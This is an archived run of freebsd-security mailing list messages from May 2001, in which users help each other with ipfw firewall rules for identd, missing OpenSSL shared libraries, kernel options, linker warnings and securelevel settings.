that my ethernet card is on x10 I added to ipfw: ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10 ipfw add deny all from any to 192.168.1.3 0-1023 in via x10 199.163.7.34 is the ip of a DALnet IRC server that checks identd My thinking here was I only wanted 199.163.7.34 to get a identd responce on 113 and block all the others from getting a responce on 113. However, all the OTHER DALnet servers are getting a responce from 113 ( not just 199.163.7.34 ) and when I ran nmap from a friends box, it showed 113 open. What am I missing? ------------------------------------------------------- Get your free, secure email at http://www.medmail.com - the e-mail service for the medical community To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9:22:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 56C4237B424 for ; Wed, 9 May 2001 09:22:23 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f49GM4G52472; Wed, 9 May 2001 09:22:05 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <002601ba1df7$4da07940$b88f39d5@a> Date: Wed, 09 May 2001 09:21:10 -0700 (PDT) From: John Baldwin To: Retal Subject: RE: Some Kernel options Cc: freebsd-security@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 09-May-95 Retal wrote: > I could not have wondered but..Its only me or other people compiling their > kernel with this options: > options KBD_INSTALL_CDEV # install a CDEV entry in /dev This allows you to use kbdcontrol(1) to switch keyboards and is quite helpful for people with USB keyboards or more than one keyboard. -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9:38:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id D105637B422 for ; Wed, 9 May 2001 09:38:50 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 413FD678BA; Wed, 9 May 2001 09:38:50 -0700 (PDT) Date: Wed, 9 May 2001 09:38:50 -0700 From: Kris Kennaway To: Peter Pentchev Cc: Rasputin , Paul Herman , security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system Message-ID: <20010509093849.B40205@xor.obsecurity.org> References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> <20010509135318.B44191@ringworld.oblivion.bg> <20010509042107.A36279@xor.obsecurity.org> <20010509143455.C44191@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="E39vaYmALEf/7YXx" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509143455.C44191@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, May 09, 2001 at 02:34:55PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --E39vaYmALEf/7YXx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, May 09, 2001 at 02:34:55PM +0300, Peter Pentchev wrote: > > There's something nonstandard about the way it's linking which is > > triggering all of the __warn_references() in libc regardless of > > whether or not the code actually uses those "dangerous" functions -- I > > don't know what it is, but I've seen it a lot in ports. It's probably > > a bug which should be fixed. >=20 > Nothing non-standard; the one about setkey() is triggered by just trying > to resolve setkey against libc's setkey symbol; similarly for the f_preal= loc() > one. It's just that these warnings would never be triggered if the linker > saw these symbols in another library, and saw no need to touch these part= icular > object files within libc. Yes, I know you get the __warn_references() if you use a libc function which has a __warn_references() line -- what happens here is that you ALSO get *all* __warn_references() present in the entire library, even if you don't use *any* of those functions, if you do the Weird Linker Thing. Kris --E39vaYmALEf/7YXx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD4DBQE6+XKZWry0BWjoQKURArFzAKC2XxHCZqRxV6QyISFJykoJuSf9UQCY7SEP H+ZM7UUfc0HeDYeOmfXjow== =bQRA -----END PGP SIGNATURE----- --E39vaYmALEf/7YXx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9:45: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.ipsnetwork.net (mail.ipsnetwork.net [209.202.83.5]) by hub.freebsd.org (Postfix) with ESMTP id 7D93837B422 for ; Wed, 9 May 2001 09:45:05 -0700 (PDT) (envelope-from nathan@vidican.com) Received: from 78lb019 (112-83.209-tic.ipsnetwork.net [209.202.83.112] (may be forged)) by mail.ipsnetwork.net (8.11.1/8.11.1) with SMTP id f4A4q7809566 for ; Thu, 10 May 2001 00:52:08 -0400 (EDT) (envelope-from nathan@vidican.com) Message-ID: <001801c0d8a6$a6d23a60$7053cad1@78lb019> From: "Nathan Vidican" To: Subject: /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found Date: Wed, 9 May 2001 12:39:43 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have no *ssl* files in /usr/lib, /usr/libexec, /usr/local/lib, or /usr/local/libexec. I have manually compiled and installed OpenSSL 0.9.6a from ftp.openssl.org, and have attempted to re-install FreeBSD twice now over FTP. I have been installing: bin, manpages, compat4x, crypto, and local. Am I just missing the right distro? Or is the Release broken or something? Where are the ssl libraries? I am attempting to install/configure apache+ssl, (from the packages), this is what I get: mx2# httpsdctl configtest /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found mx2# I have sent a few messages back and forth now from questions@freebsd.org, but someone had suggested I send this question here. So here I am. If anyone has any ideas I'd be happy to hear them? I noticed that libssl.so.1 is supposed to be a symbolic link, (as dictated by various threads I found searching the mailing lists), but the file it would link to isn't even there? Nathan Vidican Nathan@Vidican.com http://Nathan.Vidican.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9:47:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from rafiu.psi-domain.co.uk (rafiu.psi-domain.co.uk [212.87.84.199]) by hub.freebsd.org (Postfix) with ESMTP id 9625337B424 for ; Wed, 9 May 2001 09:47:13 -0700 (PDT) (envelope-from heckfordj@psi-domain.co.uk) Received: from smtp.psi-domain.co.uk (mail.trident-uk.co.uk [195.166.16.10]) by rafiu.psi-domain.co.uk (Postfix) with SMTP id 2BCB1402EC6; Wed, 9 May 2001 17:42:31 +0100 (BST) Date: Wed, 9 May 2001 18:45:52 +0100 From: Jamie Heckford To: Michael Sharp Cc: freebsd-security@freebsd.org Subject: Re: Ip filtering with ipfw Message-ID: <20010509184552.E6456@storm.psi-domain.co.uk> Reply-To: heckfordj@psi-domain.co.uk References: <20010509160500.7232.cpmta@c000.sfo.cp.net> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net>; from msharp@medmail.com on Wed, May 09, 2001 at 17:05:00 +0100 X-Mailer: Balsa 1.1.1 Lines: 78 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heres a few examples: ipfw -f flush ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 113 in via xl0 ipfw add allow tcp from 192.168.1.0/24 to any ipfw add deny log ip from any to 192.168.1.0/24 in via xl0 Of course, this is NOT a ruleset you should use in practice, and wouldn't work very well! For more examples see /etc/rc.firewall. Jamie On 2001.05.09 17:05 Michael Sharp wrote: > I am very new to FreeBSD, and have some questions about ipfw > I compiled: options IPFIREWALL > into my kernel, and added: firewall_enable="YES" in /etc/rc.conf > on reboot, I see ipfiltering initializing and the default policy is to > deny. After reboot, I do: ipfw list and get this: > > 00100 allow ip from any to any via lo0 > 00200 deny ip from any to 127.0.0.0/8 > 00300 deny ip from 127.0.0.0/8 to any > 65000 allow ip from any to any > 65535 deny ip from any to any > > which I am assuming is the defaults. Now, to keep it simple, I have a > router between my internal machine ( 192.168.1.3 ) and the Internet and I > set the router to allow only port 113 in to 192.168.1.3 > > ifconfig reveals that my ethernet card is on x10 > > I added to ipfw: > > ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10 > ipfw add deny all from any to 192.168.1.3 0-1023 in via x10 > > 199.163.7.34 is the ip of a DALnet IRC server that checks identd > My thinking here was I only wanted 199.163.7.34 to get a identd responce > on 113 and block all the others from getting a responce on 113. However, > all the OTHER DALnet servers are getting a responce from 113 ( not just > 199.163.7.34 ) and when I ran nmap from a friends box, it showed 113 > open. > > What am I missing? > > > > ------------------------------------------------------- > Get your free, secure email at http://www.medmail.com - > the e-mail service for the medical community > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > -- Jamie Heckford Network Operations Manager Psi-Domain - Innovative Linux Solutions. Ask Us How. FreeBSD - The power to serve Join our mailing list and stay informed by emailing majordomo@psi-domain.co.uk with the line: subscribe collective ===================================== email: heckfordj@psi-domain.co.uk web: http://www.psi-domain.co.uk/ tel: +44 (0)1737 789 246 fax: +44 (0)1737 789 245 mobile: +44 (0)7866 724 224 ===================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9:52:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id ECC6137B422 for ; Wed, 9 May 2001 09:52:44 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EC32C678BA; Wed, 9 May 2001 09:52:43 -0700 (PDT) Date: Wed, 9 May 2001 09:52:43 -0700 From: Kris Kennaway To: Nathan Vidican Cc: security@freebsd.org Subject: Re: /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found Message-ID: <20010509095243.A40684@xor.obsecurity.org> References: <001801c0d8a6$a6d23a60$7053cad1@78lb019> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="YZ5djTAD1cGYuMQK" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001801c0d8a6$a6d23a60$7053cad1@78lb019>; from nathan@vidican.com on Wed, May 09, 2001 at 12:39:43PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --YZ5djTAD1cGYuMQK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, May 09, 2001 at 12:39:43PM -0400, Nathan Vidican wrote: > I have no *ssl* files in /usr/lib, /usr/libexec, /usr/local/lib, or > /usr/local/libexec. I have manually compiled and installed OpenSSL 0.9.6a > from ftp.openssl.org, and have attempted to re-install FreeBSD twice now > over FTP. I have been installing: bin, manpages, compat4x, crypto, and > local. Am I just missing the right distro? Or is the Release broken or > something? Where are the ssl libraries? I am attempting to install/configure > apache+ssl, (from the packages), this is what I get: Sure you're installing the crypto distribution, not scrypto or whatever the source collection is called? What mirror site are you using? Try another one, maybe it doesn't carry the crypto collection and you're not getting (or missing) the error. Kris --YZ5djTAD1cGYuMQK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6+XXaWry0BWjoQKURAp6iAJ9gQOYTCJN0jlqVuuF7j7pWCVeOlgCg4ePO TG6qshPWLAW+cKUdKs4p6Bo= =ydwG -----END PGP SIGNATURE----- --YZ5djTAD1cGYuMQK-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 10:13:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from chalfont.mail.uk.easynet.net (chalfont.mail.uk.easynet.net [195.40.1.44]) by hub.freebsd.org (Postfix) with ESMTP id CE27237B423 for ; Wed, 9 May 2001 10:13:40 -0700 (PDT) (envelope-from steve@pavilion.net) Received: from mushroom.systems.pavilion.net (mushroom.systems.pavilion.net [212.74.1.186]) by chalfont.mail.uk.easynet.net (Postfix) with ESMTP id C1D93F8B57; Wed, 9 May 2001 18:13:37 +0100 (BST) Received: by mushroom.systems.pavilion.net (Postfix, from userid 1002) id 761FD13151; Wed, 9 May 2001 18:08:52 +0100 (BST) Date: Wed, 9 May 2001 18:08:52 +0100 From: Steve Peck To: Nathan Vidican Cc: security@FreeBSD.ORG Subject: Re: /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found Message-ID: <20010509180852.D62940@pavilion.net> References: <001801c0d8a6$a6d23a60$7053cad1@78lb019> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001801c0d8a6$a6d23a60$7053cad1@78lb019>; from nathan@vidican.com on Wed, May 09, 2001 at 12:39:43PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 12:39:43PM -0400, Nathan Vidican wrote: > I have no *ssl* files in /usr/lib, /usr/libexec, /usr/local/lib, or > /usr/local/libexec. I have manually compiled and installed OpenSSL 0.9.6a > from ftp.openssl.org, and have attempted to re-install FreeBSD twice now > over FTP. I have been installing: bin, manpages, compat4x, crypto, and > local. Am I just missing the right distro? Or is the Release broken or > something? Where are the ssl libraries? I am attempting to install/configure > apache+ssl, (from the packages), this is what I get: > > mx2# httpsdctl configtest > /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found > mx2# > > I have sent a few messages back and forth now from questions@freebsd.org, > but someone had suggested I send this question here. So here I am. If anyone > has any ideas I'd be happy to hear them? > I noticed that libssl.so.1 is supposed to be a symbolic link, (as > dictated by various threads I found searching the mailing lists), but the > file it would link to isn't even there? > I appologise now - this isn't going to answer your problem :( I ftp installed FreeBSD4.3 over the weekend - I get ssh installed automatically and the sshd daemon just gets started too. Just did a standard installation - think I chose the basic users+X option. bash-2.05$ ls -l /usr/lib/compat/libssl.so.1 -r--r--r-- 1 root wheel 174048 Apr 21 10:05 /usr/lib/compat/libssl.so.1 bash-2.05$ ls /usr/lib/*ssl* /usr/lib/libssl.a /usr/lib/libssl.so.2 /usr/lib/libssl.so /usr/lib/libssl_p.a bash-2.05$ ls -l /usr/libexec/ld-elf.so.1 -r-xr-xr-x 1 root wheel 75472 Apr 21 10:08 /usr/libexec/ld-elf.so.1 bash-2.05$ and it seems to work OK. Hmm, didn't have any problem with 4.2 iirc. I gotta ask, why did you manually compiled and install OpenSSL 0.9.6a from ftp.openssl.org? Its in the ports /usr/ports/security/openssh bash-2.05$ less /usr/ports/security/openssh/pkg-descr OpenSSH is a version of Secure Shell based upon a much less encumbered SSH version 1.2.12, which has a BSD-style license. Maintained by the OpenBSD project, this is the most free and secure SSH implementation in the world. OpenSSH supports SSH protocol version 1.5 and has all known bugs from SSH fixed, and even some unknown ones :) Just a make install would be required! I suggest getting the FreeBSD4.3 'kern' an 'mkfs' .flp files and another install. Sorry, couldn't help! Cheers Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 10:17:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 28E8837B422 for ; Wed, 9 May 2001 10:17:41 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1309 invoked by uid 1000); 9 May 2001 17:17:08 -0000 Date: Wed, 9 May 2001 20:17:08 +0300 From: Peter Pentchev To: Kris Kennaway Cc: Rasputin , Paul Herman , security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system Message-ID: <20010509201708.D497@ringworld.oblivion.bg> Mail-Followup-To: Kris Kennaway , Rasputin , Paul Herman , security@FreeBSD.ORG References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> <20010509135318.B44191@ringworld.oblivion.bg> <20010509042107.A36279@xor.obsecurity.org> <20010509143455.C44191@ringworld.oblivion.bg> <20010509093849.B40205@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509093849.B40205@xor.obsecurity.org>; from kris@obsecurity.org on Wed, May 09, 2001 at 09:38:50AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 09:38:50AM -0700, Kris Kennaway wrote: > On Wed, May 09, 2001 at 02:34:55PM +0300, Peter Pentchev wrote: > > > > There's something nonstandard about the way it's linking which is > > > triggering all of the __warn_references() in libc regardless of > > > whether or not the code actually uses those "dangerous" functions -- I > > > don't know what it is, but I've seen it a lot in ports. It's probably > > > a bug which should be fixed. > > > > Nothing non-standard; the one about setkey() is triggered by just trying > > to resolve setkey against libc's setkey symbol; similarly for the f_prealloc() > > one. It's just that these warnings would never be triggered if the linker > > saw these symbols in another library, and saw no need to touch these particular > > object files within libc. > > Yes, I know you get the __warn_references() if you use a libc function > which has a __warn_references() line -- what happens here is that you > ALSO get *all* __warn_references() present in the entire library, even > if you don't use *any* of those functions, if you do the Weird Linker > Thing. Oh, I thought you meant this specific case. In this case, the original poster was referencing both f_prealloc() and setkey() in his program, so the warnings should be expected. G'luck, Peter -- I've heard that this sentence is a rumor. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 11:53:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from gaia.nimnet.asn.au (nimbin.lnk.telstra.net [139.130.45.143]) by hub.freebsd.org (Postfix) with ESMTP id 05D5637B422 for ; Wed, 9 May 2001 11:53:30 -0700 (PDT) (envelope-from smithi@nimnet.asn.au) Received: from localhost (smithi@localhost) by gaia.nimnet.asn.au (8.8.8/8.8.8R1.2) with SMTP id EAA25947; Thu, 10 May 2001 04:53:22 +1000 (EST) (envelope-from smithi@nimnet.asn.au) Date: Thu, 10 May 2001 04:53:22 +1000 (EST) From: Ian Smith Reply-To: Ian Smith To: Michael Sharp Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: Ip filtering with ipfw In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 9 May 2001, Michael Sharp wrote: > I am very new to FreeBSD, and have some questions about ipfw > I compiled: options IPFIREWALL > into my kernel, and added: firewall_enable="YES" in /etc/rc.conf > on reboot, I see ipfiltering initializing and the default policy is > to deny. After reboot, I do: ipfw list and get this: > > 00100 allow ip from any to any via lo0 > 00200 deny ip from any to 127.0.0.0/8 > 00300 deny ip from 127.0.0.0/8 to any > 65000 allow ip from any to any > 65535 deny ip from any to any This default policy is to allow (line 65000) except from/to 127.0.0.0/8 > I added to ipfw: > ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10 > ipfw add deny all from any to 192.168.1.3 0-1023 in via x10 [..] > However, all the OTHER DALnet servers are getting a responce from 113 > ( not just 199.163.7.34 ) and when I ran nmap from a friends box, it > showed 113 open. > What am I missing? # ipfw delete 65000 But then, you want to check out example rules regarding denying spoofing in and out, allowing established TCP but only allowing specific setups, allowing UDP such as DNS, etc .. eg, not much use allowing 199.163.7.34 to connect if the reply packets can't get back, and such .. Cheers, Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 12:14:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from amersham.mail.uk.easynet.net (amersham.mail.uk.easynet.net [195.40.1.45]) by hub.freebsd.org (Postfix) with ESMTP id CC8F537B423 for ; Wed, 9 May 2001 12:14:09 -0700 (PDT) (envelope-from steve@pavilion.net) Received: from mushroom.systems.pavilion.net (mushroom.systems.pavilion.net [212.74.1.186]) by amersham.mail.uk.easynet.net (Postfix) with ESMTP id 9FB731767A for ; Wed, 9 May 2001 20:14:02 +0100 (BST) Received: by mushroom.systems.pavilion.net (Postfix, from userid 1002) id F3C6913151; Wed, 9 May 2001 20:09:21 +0100 (BST) Date: Wed, 9 May 2001 20:09:21 +0100 From: Steve Peck To: security@FreeBSD.ORG Subject: kernel security level Message-ID: <20010509200921.A65710@pavilion.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've installed the FreeBSD 4.3 And I got this strange problem where the kern.sercurelevel was set to 1. I had a version of 4.2 which just defaults to -1. Is this something new? Although it seems like a good idea, I had much trouble finding out why I couldn't run X windows. Soon as I found a reference to this /dev/mem suddenly was permitted and X started up - but only as root :-(. I have since found that I can run X (as root) on kern.securelevel = 0 But if I set it to this via /etc/sysctl.conf it just gets upgraded to level 1! So, I now have it set to level -1 in /etc/sysctl.conf. If I did want to run at level 0 then I would have to upgrade it manually By loggin in as root and doing # sysctl - w kern.securelevel=0 every reboot :-( Now, have I done something stangely bad during my install. I just ftp'd it from the ftp.uk.FreeBSD.org site. If I try to startx as a user then I now get Fatal server error: xf86OpeConsole:Server must be suid root Hmmmm, anyone got any ideas? Cheers Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 13: 3:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from c000.sfo.cp.net (c004-h003.c004.snv.cp.net [209.228.33.67]) by hub.freebsd.org (Postfix) with SMTP id E34FD37B424 for ; Wed, 9 May 2001 13:03:35 -0700 (PDT) (envelope-from msharp@medmail.com) Received: (cpmta 7681 invoked from network); 9 May 2001 13:03:35 -0700 Date: 9 May 2001 13:03:35 -0700 Message-ID: <20010509200335.7680.cpmta@c000.sfo.cp.net> X-Sent: 9 May 2001 20:03:35 GMT Received: from [66.26.118.70] by mail.medmail.com with HTTP; 09 May 2001 13:03:35 PDT Content-Type: text/plain Content-Disposition: inline Mime-Version: 1.0 To: FreeBSD-security@FreeBSD.org From: Michael Sharp X-Mailer: Web Mail 3.7.1.9 Subject: ipfw Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org expanding on what Noel Fitzpatrick said... If I do ipfw -f flush I still have rule 65535 deny ip from any to any which allows NOTHING in or OUT. I can add DENY chains all day, but I cannot add any ALLOW chains unless I put in rule 65000 allow ip from any to any but this goes at the very top and is the first chain processed ( which allows ANYTHING in ) even if there are DENY chains below it. SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT to my kernel and recompiled In /etc/rc.conf, I have firewall_enable="YES" and firewall_type="open" and still I cannot get rid of that pesky 65535 DENY everything rule that wont let me do anything unless I add " ipfw add allow ip from any to any " which allows everything despite ANY DENY chains. ------------------------------------------------------- Get your free, secure email at http://www.medmail.com - the e-mail service for the medical community To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 13:18:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from c000.sfo.cp.net (c004-h012.c004.snv.cp.net [209.228.33.76]) by hub.freebsd.org (Postfix) with SMTP id 7C2FB37B43C for ; Wed, 9 May 2001 13:18:53 -0700 (PDT) (envelope-from msharp@medmail.com) Received: (cpmta 6522 invoked from network); 9 May 2001 13:18:53 -0700 Date: 9 May 2001 13:18:53 -0700 Message-ID: <20010509201853.6521.cpmta@c000.sfo.cp.net> X-Sent: 9 May 2001 20:18:53 GMT Received: from [66.26.118.70] by mail.medmail.com with HTTP; 09 May 2001 13:18:53 PDT Content-Type: text/plain Content-Disposition: inline Mime-Version: 1.0 To: FreeBSD-security@FreeBSD.org From: Michael Sharp X-Mailer: Web Mail 3.7.1.9 Subject: Re: ipfw Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org But I need to block port 113, and allow 1 machine to get to port 113. HAVING to add ipfw add allow ip from any to any gets process before I would allow my 1 machine to port 113, thus allowing every machine to port 113 On Wed, 09 May 2001, Ron Brogden wrote: > > On Wednesday 09 May 2001 20:03, you wrote: > > and still I cannot get rid of that pesky 65535 DENY everything rule that > > wont let me do anything unless I add " ipfw add allow ip from any to any " > > which allows everything despite ANY DENY chains. > > Why can't you add the specific deny rules first if that is how you want > things to work. Just give them a lower precedence than your blanket allow > rule: > > ipfw add 40000 deny something from somewhere to somewhere_else > ipfw add 50000 deny something from somewhere to somewhere_else > ipfw add 60000 allow ip from any to any > > That said, shouldn't you be allowing specific stuff and then denying by > default? > > Cheers, > > Ron > ------------------------------------------------------- Get your free, secure email at http://www.medmail.com - the e-mail service for the medical community To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 13:45:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id EECBC37B422 for ; Wed, 9 May 2001 13:45:35 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id OAA08251; Wed, 9 May 2001 14:45:31 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id OAA17963; Wed, 9 May 2001 14:45:27 -0600 (MDT) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15097.44134.876784.259823@nomad.yogotech.com> Date: Wed, 9 May 2001 14:45:26 -0600 (MDT) To: Michael Sharp Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: Ip filtering with ipfw In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net> References: <20010509160500.7232.cpmta@c000.sfo.cp.net> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > After reboot, I do: ipfw list and get this: > > 00100 allow ip from any to any via lo0 > 00200 deny ip from any to 127.0.0.0/8 > 00300 deny ip from 127.0.0.0/8 to any > 65000 allow ip from any to any > 65535 deny ip from any to any > > which I am assuming is the defaults. This is the default 'open' setup, yes, and happens because you added the following (mentioned in another email). > SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT to my > kernel and recompiled. Otherwise, rule 65000 wouldn't have existed. > Now, to keep it simple, I have a router between my internal machine ( > 192.168.1.3 ) and the Internet and I set the router to allow only port > 113 in to 192.168.1.3 Am I to assume the 'router' is the firewall box? > ifconfig reveals that my ethernet card is on x10 > > I added to ipfw: > > ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10 > ipfw add deny all from any to 192.168.1.3 0-1023 in via x10 > > 199.163.7.34 is the ip of a DALnet IRC server that checks identd So far so good. > My thinking here was I only wanted 199.163.7.34 to get a identd > responce on 113 and block all the others from getting a responce on > 113. If you're just worried about 113, then a rule like this may be more effective. ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 113 in via x10 This limits the IRC server to a single port. The second rule is adequate. > However, all the OTHER DALnet servers are getting a responce from > 113 ( not just 199.163.7.34 ) and when I ran nmap from a friends box, > it showed 113 open. > > What am I missing? What does an 'ipfw list' after you add the rules show? Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 13:46:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 2859C37B422 for ; Wed, 9 May 2001 13:46:32 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GD35OT00.197; Wed, 9 May 2001 13:46:05 -0700 Message-ID: <3AF9ACA2.712EF7F3@globalstar.com> Date: Wed, 09 May 2001 13:46:26 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Michael Sharp Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: ipfw References: 